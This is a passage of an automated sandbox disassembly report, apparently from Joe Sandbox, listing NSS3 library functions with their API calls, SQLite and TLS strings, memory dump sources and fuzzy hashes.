Instruction Fuzzy Hash: C92183B6A402056BFB015AA3AD81FFF366CAB4175CF080034FD04D9646FB26E91A8376

Function 6C5A2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5A2CDA,?,00000000), ref: 6C5A2E1E

Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C5A9003,?), ref: 6C5FFD91
Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(A4686C60,?), ref: 6C5FFDA2
Part of subcall function 6C5FFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C60,?,?), ref: 6C5FFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C5A2E33

Part of subcall function 6C5FFD80: free.MOZGLUE(00000000,?,?), ref: 6C5FFDD1

TlsGetValue.KERNEL32 ref: 6C5A2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C5A2E5E
PL_HashTableLookup.NSS3(?), ref: 6C5A2E71
PL_HashTableRemove.NSS3(?), ref: 6C5A2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C5A2E96
PR_Unlock.NSS3 ref: 6C5A2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5A2EC5

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 1158814970e2cc235ae4cfa9cf6e7604f3046f5833bdcc0309eea335487f1881
Instruction ID: d1c21ea8017e1cd92b8829084a545fd9593afa8de562bcc7d9977b4bb1ed0967
Opcode Fuzzy Hash: 1158814970e2cc235ae4cfa9cf6e7604f3046f5833bdcc0309eea335487f1881
Instruction Fuzzy Hash: 7D210DB6B00100A7DF011B66EC4AAAB3A75DB9235DF044534ED1C82B11FB32C969C7E1

Function 6C58FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C58FD18
sqlite3_initialize.NSS3 ref: 6C58FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C58FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C58FD99
sqlite3_free.NSS3(00000000), ref: 6C58FE3C
sqlite3_free.NSS3(?), ref: 6C58FEE3
sqlite3_free.NSS3(?), ref: 6C58FEEE

Strings

simple, xrefs: 6C58FC79

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: d403a901bd2e8aed4942600db07ce9d1a8c54f57c4c70382decf1b89ad731140
Instruction ID: f1abc00e243cec7c34124d22a97e3a78c435b9824ce30eae093ad49cb25df008
Opcode Fuzzy Hash: d403a901bd2e8aed4942600db07ce9d1a8c54f57c4c70382decf1b89ad731140
Instruction Fuzzy Hash: A89151B0A02215DFDB04CF55CC80A6AB7F1FF89318F24C668D9199BB52E735E951CBA0

Function 6C595CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C595EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C595EED

Strings

unable to close due to unfinalized statements or unfinished backups, xrefs: 6C595E64
invalid, xrefs: 6C595EBE
%s at line %d of [%.10s], xrefs: 6C595EE0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C595ED1
API call with %s database connection pointer, xrefs: 6C595EC3
misuse, xrefs: 6C595EDB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 771021cb757d2d7fbdb8234d25aeaef6c2cec1c60feaf94865ff4be66b8ed170
Instruction ID: 74270e640c9f5b0e11ca9c201247af7e889867679e48c0f82c3d5fbdd4516186
Opcode Fuzzy Hash: 771021cb757d2d7fbdb8234d25aeaef6c2cec1c60feaf94865ff4be66b8ed170
Instruction Fuzzy Hash: F481DF70B067819BEB19CF25CC48B6A7370BF4131AFA807E8D8155BB61C730E966CB91

Function 6C57DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C57DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C57DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C57DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C57DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C57DF78

Strings

%s at line %d of [%.10s], xrefs: 6C57DE61, 6C57DE90
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C57DE52, 6C57DE81
database corruption, xrefs: 6C57DE5C, 6C57DE8B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 91a42881e3b513e5a998c5ece766d0f401b35025409d13fcb16047a67d495503
Instruction ID: d756c454773893eba248f52dcb91202399d9339e4ad7bf79ecd524acdb17abd1
Opcode Fuzzy Hash: 91a42881e3b513e5a998c5ece766d0f401b35025409d13fcb16047a67d495503
Instruction Fuzzy Hash: FA81A1716043009FD724CF25CD84B6A77F1AF85318F15886DE89A8BB91EB35E885CB62

Function 6C52CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C52B999), ref: 6C52CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C52B999), ref: 6C52D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C52B999), ref: 6C52D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C52B999), ref: 6C67972B

Strings

%s at line %d of [%.10s], xrefs: 6C52CFEC, 6C52D018, 6C52D029, 6C52D03F, 6C67978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52CFDD, 6C52D00E, 6C52D022, 6C52D033, 6C679780
database corruption, xrefs: 6C52CFE7, 6C52D013, 6C52D028, 6C52D039, 6C52D03E, 6C679786

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 711dd0f70dfbf913542b4ce81d124b802870c0eab8e3c1dede12d4d91acd29ec
Instruction ID: 7f67e36ceb276d492b315c0a54b85388a358dc420aa6fb941699e057ed36dfdd
Opcode Fuzzy Hash: 711dd0f70dfbf913542b4ce81d124b802870c0eab8e3c1dede12d4d91acd29ec
Instruction Fuzzy Hash: EA613971A042108BD320CF29CC40BA6B7F5EF95319F58856DE4489FB82E37AE847C7A5

Function 6C62FFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PK11_FreeSymKey.NSS3(00000000), ref: 6C630113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C630130
PORT_Alloc_Util.NSS3(00000040), ref: 6C63015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C6301AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6C630202
free.MOZGLUE(?), ref: 6C630224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C630253

Strings

exporter, xrefs: 6C6300F7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: dad6906d053dda8580828cb3c2b4d303dd59f0f7ca543872f23eb6a3d77dfb1f
Instruction ID: 2387ce6af96fc6ad94a0401694624ab4dcd0fa33bc54d9bd8154e872140278d8
Opcode Fuzzy Hash: dad6906d053dda8580828cb3c2b4d303dd59f0f7ca543872f23eb6a3d77dfb1f
Instruction Fuzzy Hash: C8612471D043999BEF018FA4CC00BEE77B6FF8930CF146228E91E56661E731A958CB49

Function 6C604DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C60536F,00000022,?,?,00000000,?), ref: 6C604E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C604F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C604F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C604FAE
free.MOZGLUE(?), ref: 6C604FC8

Strings

oS`l", xrefs: 6C604DFB, 6C604EF4, 6C604EC5
%s=%s, xrefs: 6C604F89
%s=%c%s%c, xrefs: 6C604FA9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS`l"
API String ID: 2709355791-1759582836
Opcode ID: 32009d437ca03b9a3fc3314471f2c0b7b9729a9b111278afaa614427095af79b
Instruction ID: 424f24b5622bfb7793dd26bae22e4c1688db9d56f6a7771babb3a1e2b939fab0
Opcode Fuzzy Hash: 32009d437ca03b9a3fc3314471f2c0b7b9729a9b111278afaa614427095af79b
Instruction Fuzzy Hash: B5519C71B051458BEF29CA6AC6903FF7BF29FA2348F188165E890B7B41D37598068798

Function 6C62EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62EF6D

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

htonl.WSOCK32(00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62EFE4
htonl.WSOCK32(?,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62EFF1
memcpy.VCRUNTIME140(?,?,6C64A4A1,?,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C64A4A1,?,00000000,?,00000001), ref: 6C62F027

Strings

dtls13, xrefs: 6C62EF33

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 1c10a2638670cbfdcd847cdd61d709a3e90c36415bbe5a36d0b8e60f01d8752a
Instruction ID: c01d6127328247a4929be9560c7fa19bea4db85353ccb8e629eb19d42a83218b
Opcode Fuzzy Hash: 1c10a2638670cbfdcd847cdd61d709a3e90c36415bbe5a36d0b8e60f01d8752a
Instruction Fuzzy Hash: F231D071A01211ABC720DF38DC80B8AB7E4EF49349F258079E9189B751E735E915CBE9

Function 6C5AAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5AAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6C9500,6C5A3F91), ref: 6C5AAFD2

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

DER_GetInteger_Util.NSS3(?), ref: 6C5AB007

Part of subcall function 6C5F6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C5A1666,?,6C5AB00C,?), ref: 6C5F6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5AB02F
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5AB046
PL_FreeArenaPool.NSS3 ref: 6C5AB058
PL_FinishArenaPool.NSS3 ref: 6C5AB060

Strings

security, xrefs: 6C5AAFB8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 4cf92ade33d3d8cebdc5909ea81b8eafdd4f257892e68f64add9df237aecb536
Instruction ID: 4a926b3f3dcabd864cd441f504a4093e51bfa53e272912c101c82ecc67b56c2a
Opcode Fuzzy Hash: 4cf92ade33d3d8cebdc5909ea81b8eafdd4f257892e68f64add9df237aecb536
Instruction Fuzzy Hash: 40313571504304D7DB109F669C40BAE77A4BF8632CF104718E9B46BBC1E732914A8B9B

Function 6C5A3E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6C5A40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C5A3F7F,?,00000055,?,?,6C5A1666,?,?), ref: 6C5A40D9
Part of subcall function 6C5A40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C5A1666,?,?), ref: 6C5A40FC
Part of subcall function 6C5A40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C5A1666,?,?), ref: 6C5A4138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A3EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A3ED6

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A3EEE

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A3F02
PL_FreeArenaPool.NSS3 ref: 6C5A3F14
PL_FinishArenaPool.NSS3 ref: 6C5A3F1C

Part of subcall function 6C6064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C60127C,00000000,00000000,00000000), ref: 6C60650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A3F27

Strings

security, xrefs: 6C5A3EBC

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: 50b5e1755f9935ceb511122f04aeaa31390982da434c305b926fe524bf04ea3f
Instruction ID: 36dc0ba664b6f81f2bf45ed42990ac76d1e93e3ba7c0c7f11879d2a1591008fd
Opcode Fuzzy Hash: 50b5e1755f9935ceb511122f04aeaa31390982da434c305b926fe524bf04ea3f
Instruction Fuzzy Hash: 6821FBB2A04300ABD7148B55AC41F5B77A8BF8931CF04053DF959A7B41E730D918CB9E

Function 6C5DACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C5DACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5DAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAD23

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5DAD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C5DAD1C
hSession = 0x%x, xrefs: 6C5DACFE, 6C5DAD0E
nkl, xrefs: 6C5DAD51, 6C5DAD7B
C_MessageDecryptFinal, xrefs: 6C5DACE1

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nkl
API String ID: 332880674-3973460435
Opcode ID: bcb6e567ffe3900aeb9ba1fc20d84deef854bb81e504426bfa990033c90abfb5
Instruction ID: 6d3f43638aa7f7cce649d77a54c54c07cfe5da1c906bf247b5e98e2ab2043f54
Opcode Fuzzy Hash: bcb6e567ffe3900aeb9ba1fc20d84deef854bb81e504426bfa990033c90abfb5
Instruction Fuzzy Hash: 6821F8B1700244DFDB00EF68DD88B6B3775EB82319F454439E40AABA51DF34AC48CB9A

Function 6C5ECC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C5ECD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C5ECE16
PR_SetError.NSS3(00000000,00000000), ref: 6C5ED079

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: dc0dc8ebdddc091dab9d98faa4c1ebb67c8348b81e35a4d9a985a6a55ad4a5c3
Instruction ID: 8b0543a75364668cbb21628750f119b297c71c5842a58c9821d7e282ec54216d
Opcode Fuzzy Hash: dc0dc8ebdddc091dab9d98faa4c1ebb67c8348b81e35a4d9a985a6a55ad4a5c3
Instruction Fuzzy Hash: DAC17FB5A002199BDB11DF24CC80BDABBB4BF8C318F1441A8E958A7741E775EE95CF90

Function 6C5DDC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C5E97C1,?,00000000,00000000,?,?,?,00000000,?,6C5C7F4A,00000000), ref: 6C5DDC68

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDE43
